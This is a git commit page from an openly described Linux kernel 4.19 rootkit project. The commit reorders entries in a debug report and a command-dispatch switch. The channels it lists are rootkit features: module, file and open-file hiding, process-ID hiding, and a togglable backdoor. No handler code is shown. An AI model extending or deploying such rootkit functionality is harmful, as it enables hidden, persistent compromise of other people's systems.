linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit ea5efa1605af85654ed4c91cfd15f51cbc983466
parent ab51a89125ebad2454b244bbabda8cc5f6ccc264
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 15:34:08 +0100

reorders channels in report

Diffstat:

Msrc/channel.c | 4++--


1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -27,9 +27,9 @@ report_channels(void)
     DEBUG_NOTICE("%-24s %#10lx\n", "MODHIDE",  G7_MODHIDE);
     DEBUG_NOTICE("%-24s %#10lx\n", "FILEHIDE", G7_FILEHIDE);
     DEBUG_NOTICE("%-24s %#10lx\n", "OPENHIDE", G7_OPENHIDE);
+    DEBUG_NOTICE("%-24s %#10lx\n", "HIDEPID",  G7_PIDHIDE);
     DEBUG_NOTICE("%-24s %#10lx\n", "BACKDOOR", G7_BACKDOOR);
     DEBUG_NOTICE("%-24s %#10lx\n", "TOGGLEBD", G7_TOGGLEBD);
-    DEBUG_NOTICE("%-24s %#10lx\n", "HIDEPID",  G7_PIDHIDE);
     DEBUG_NOTICE("-----------------------------------\n");
 }
 
@@ -41,9 +41,9 @@ detect_channel(unsigned cmd)
     case G7_MODHIDE:  return (channel_t){ "MODHIDE",  handle_modhide  };
     case G7_FILEHIDE: return (channel_t){ "FILEHIDE", handle_filehide };
     case G7_OPENHIDE: return (channel_t){ "OPENHIDE", handle_openhide };
+    case G7_PIDHIDE:  return (channel_t){ "HIDEPID",  handle_pidhide  };
     case G7_BACKDOOR: return (channel_t){ "BACKDOOR", handle_backdoor };
     case G7_TOGGLEBD: return (channel_t){ "TOGGLEBD", handle_togglebd };
-    case G7_PIDHIDE:  return (channel_t){ "HIDEPID",  handle_pidhide  };
     }
 
     return (channel_t){ "unknown", NULL };